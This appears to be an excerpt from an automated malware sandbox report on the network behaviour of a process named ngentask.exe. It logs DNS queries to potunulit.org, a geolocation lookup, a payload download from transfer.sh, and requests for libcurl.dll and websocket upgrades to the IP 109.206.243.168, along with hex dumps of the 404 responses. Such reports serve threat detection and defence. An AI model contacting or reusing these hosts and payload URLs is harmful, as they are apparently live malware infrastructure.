              Source: ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
              Source: ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
              Source: ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
              Source: ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: unknownDNS traffic detected: queries for: potunulit.org
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /get/pMeglv/Blue.bin HTTP/1.1Host: transfer.shConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /upload/libcurl.dll HTTP/1.1Host: 109.206.243.168User-Agent: curl/5.9Connection: closeX-CSRF-TOKEN: fmink0nOam7KoC/9AgKuecKr+zF4JrNpfDFMHBsXu52X3IlDVGlEcd+VtBrKAYeaJ5PIJVhvN1kt2smq7jZylA==Cookie: CSRF-TOKEN=fmink0nOam7KoC/9AgKuecKr+zF4JrNpfDFMHBsXu52X3IlDVGlEcd+VtBrKAYeaJ5PIJVhvN1kt2smq7jZylA==; LANG=en-US
              Source: global trafficHTTP traffic detected: GET /upload/libcurl.dll HTTP/1.1Host: 109.206.243.168User-Agent: curl/5.9Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: owA5TgXDAlJegBd
              Source: global trafficHTTP traffic detected: GET /upload/libcurl.dll HTTP/1.1Host: 109.206.243.168User-Agent: curl/5.9Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Bn5huQMTqqBNkhY
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CQZ7%2FMq01DA5TdI%2FaoZLK6EiQfZ7IOe%2FPiwNNI62pTzzn4sd09zdQp4Chc4MExXknBoXofsythMK2HQeAXjN5iwxrvmvM85WBjZ31VAJabM%2B%2B1JRLGnYcS0T3ZkiiHXp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb782fcd8bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a Data Ascii: 7=S
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zoyL3JudZkxZGPyajwHhYJEt3MKJA3JSJb4BXulJtXBgyn8pI2DVSzz8P%2BLJP3HaRB8FQvbrNMJOQVg8YDFZFLUamCzFLjjHXr4p5qcKSObg%2F%2F9TN24f615v3InmkfBS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb783fe73bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hbc9K3B9w1bmfEKveav6nsobKSLVwAthmn3oQf2v%2FkvykA%2BX0eE6xhWMlxQmMvPFA2E1IRVbyJHYnBROABF33uXRZh3VBOsL88mIlyf1N2%2BC%2Fp2rdxYdFxVMQum6EYS%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb787ccb6bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KwE7CRlUFwxaeFpr63THPJZ6fo3ugqGqcDWc2xxQ3gAOcqRTrUTncoQ0qD1RfOvJNYvSMfnyG89aY1ZMqpELOAW8kPzOAa8UxvpzNIkQnstdqtvM3xvsQRoHC3HidwNC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb788de9cbb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 90 eb 68 9f 89 74 7e f6 25 24 85 3a f9 b7 59 f9 62 25 fa d8 0d 89 b4 f0 f1 91 66 7b bf 47 5f 39 f9 de 64 4f 7a 6f 3b 4e 82 98 d3 36 d5 45 3d f4 19 00 51 75 34 16 51 22 3b a5 92 d7 d8 ce b7 49 00 7e ae ac c3 86 21 5f 36 f8 37 33 f2 25 75 da ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 ba aa 8f 74 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e d7 f6 ff 78 d7 d5 d9 c4 0d 13 13 89 66 e1 92 24 18 4f c5 03 11 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba 74 94 be 21 51 61 46 d0 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d eb 6b e5 0e c0 eb 7e 71 eb f0 74 18 38 b7 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb 93 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 83 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 65 fa de 8e 82 11 e8 e4 1f cc a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 fc ab fa 1d d4 ec 69 91 9c 1d 0f f1 2c c8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 9c 95 8b 8b e1 12 fb d5 9c a6 c3 e0 2b 63 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*ht~%$:Yb%f{G_9dOzo;N6E=Qu4Q";I~!_673%up"XJ3Ob>!ZC:>tSSQ*{~xf$Oa~i~]DzN,t
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tJRMiBv%2Fo1O7pddNIovR9%2BkbH%2FNFx5Agj9q6RyLCEoEq1Ie%2B%2BStJ7MimILDHCxYIL7GV9drV5WPvuwrH%2BBtNcIPbIU5g72qmmPHQwMHDOtfbO6t4qAcTbUmRDXQfvJf4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb796ae7fbb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hMVTlmLiaS0u3lcFuyO9PWh8h%2FlTVPPCAHksGY2T0ZuUp7CSIG75%2Bpuz5WlvdeiDYuqPipvotJuyuXe4kEJxi1e6YyHH2THjoy%2FevH8rA7AZLAZi1zUYikxGSOt4AJKP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb797f861bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 45 f9 be 81 5c 66 a8 e8 f0 36 53 24 2c a5 8f e7 b7 37 3d c6 e6 9b 62 ee 24 83 a6 65 03 55 89 27 15 58 4a 51 ed 7d ed 50 70 4c 7f 28 8d 57 eb ea d2 40 02 6b a6 04 87 3c ee b7 5a c9 0e dc 61 57 d5 6c 7d b2 16 94 f7 41 be f3 79 4f 23 37 a3 c4 29 35 5b a5 cc 40 e2 5e 61 26 01 56 cf 43 b1 4e a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff 8a f3 9a b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c2 a1 61 d0 cb f5 69 4f 3a 17 7e 5f af 9a ce a0 c9 a0 c1 a9 dd 7a 0d 50 5b 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3e 7c 88 28 c8 48 6e a1 c0 4a 9a 03 fd ec 9e 7a 42 ac 87 2b bd 61 3f 9b 44 bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 48 7f 17 4c 25 56 ad f3 57 fb 1c b9 42 53 ce 23 b2 75 0e 31 79 92 90 f7 df 09 f4 e7 ea 3f 4c 80 d0 92 c0 13 ff 0d bb d6 3f f0 29 27 c8 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 d7 bf 6e 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 27 28 66 91 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 04 85 f2 5b 1e 44 ab 1e 26 d3 04 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f da 89 d9 b0 99 c7 8c 8a cd d6 7f 74 79 e2 78 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f ec 1b 8a 7a 8f f6 7d e3 cd c0 d9 37 00 64 f6 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 46 d3 0d ca 82 0f 13 2e 9f 28 cc ec 35 6c d6 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 f1 34 da a9 c3 68 f1 2f cb a8 Data Ascii: 37ae`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*E\f6S$,7=b$eU'XJQ}PpL(W@k<ZaWl}AyO#7)5[@^a&VCN:V?#BSSR+{2DMaiO:~_zP[,'Qa>|(H
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ITc4s3qiDzDXTGVdO5yCasCjJDCLbSBAb53qjx%2BlQXWpW9cw2nsH7g1e%2BXD3Tn8UYRVZZ07o4BEy7pFemVo6vtl7n4GdADkIpmWpynkv9yFggIr%2BmyU%2BWNjzvEb%2F0M1W"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb7b4de82bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YjFvyGi%2FhC3YzFHEQEAOJmwq8NtdjGI95kSnfhJCR4q6yhhGbjJbrpf9yYVm8WK5qqyQ1IyLkajz4Cn4Kqlhief%2FCcMOXRGhyax%2FRUDm%2B8JFpDj0pqnLxTyKIZlDNiv%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb7b5bfe7bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mTwRIfe5fSyK6G8IqHdJcZxWZuEywq7C2ZqwSA02VUXjoofH8iKSLq4LXMTYP4IXyufz8DVUfNhOLaaf64lRI2q6qLqEqGXBJoxywyMQe8UvO5Oioj0nZg5hG94RwJmy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb7b688fcbb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
